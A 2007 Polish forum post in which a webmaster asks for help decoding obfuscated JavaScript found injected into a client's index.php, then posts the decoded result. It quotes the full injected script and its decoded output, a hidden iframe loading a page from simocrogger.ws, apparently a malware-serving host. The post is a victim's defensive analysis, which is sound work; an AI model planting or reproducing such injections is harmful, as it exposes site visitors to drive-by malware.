złośliwy kod JS, prośba o pomoc Opcje

[shpyo]

Witam,
na jednej ze stron klienta w pliku index.php znalazłem taki oto kod JS

Kod

<script language='JavaScript'>
function nbsp()
{
    var t,o,l,i,j;
    var s='';
    s += '060047116101120116097116101097062060047116101120116097114101097062';
    s += '0600730700820650770690321151140990610341041161161120580470471151051091110991
14111103103101114046119';
    s = s + '1150471021080971151040471051101001011200461121041120340321191051001161040610
53032104101105103104116';
    s = s + '0610530321151161211081010610341001051151121080971210581101111101010340620600
47073070082065077069062';
    s = s + '032';
    t = '';
    l=s.length;
    i=0;
    while(i<(l-1))
    {
        for(j=0;j<3;j++)
        {
            t+=s.charAt(i);
            i++;
        }
        if((t-unescape(0xBF))>unescape(0x00))
            t-=-(unescape(0x08)+unescape(0x30));
        document.write(String.fromCharCode(t));
        t='';
    }
}
nbsp();
</script>

Ten kod podejrzewam jakieś niecne plany (badware). Efektem tego jest informacja w google, że strona może zawierać złośliwe oprogramowanie.
Próbowałem zobaczyć co ten kod generuje i jedyne co udało mnie się znaleźć to:

Kod

<㋜꼕쀀

i że próbuje się łączyć z tym adresem http://simocrogger.ws

Ma ktoś jakieś pomysły jak to ugryźć (zmusić do pokazania kodu)?

edycja:
mam już kod

Kod

%3C/textatea%3E%3C/textarea%3E%3CIFRAME%20src%3D%22http%3A//simocrogger.ws/flash/index.php%22%20width%3D5%20height%3D5%20style%3D%22display%3Anone%22%3E%3C/IFRAME%3E%20

Ten post edytował shpyo 18.07.2007, 10:06:42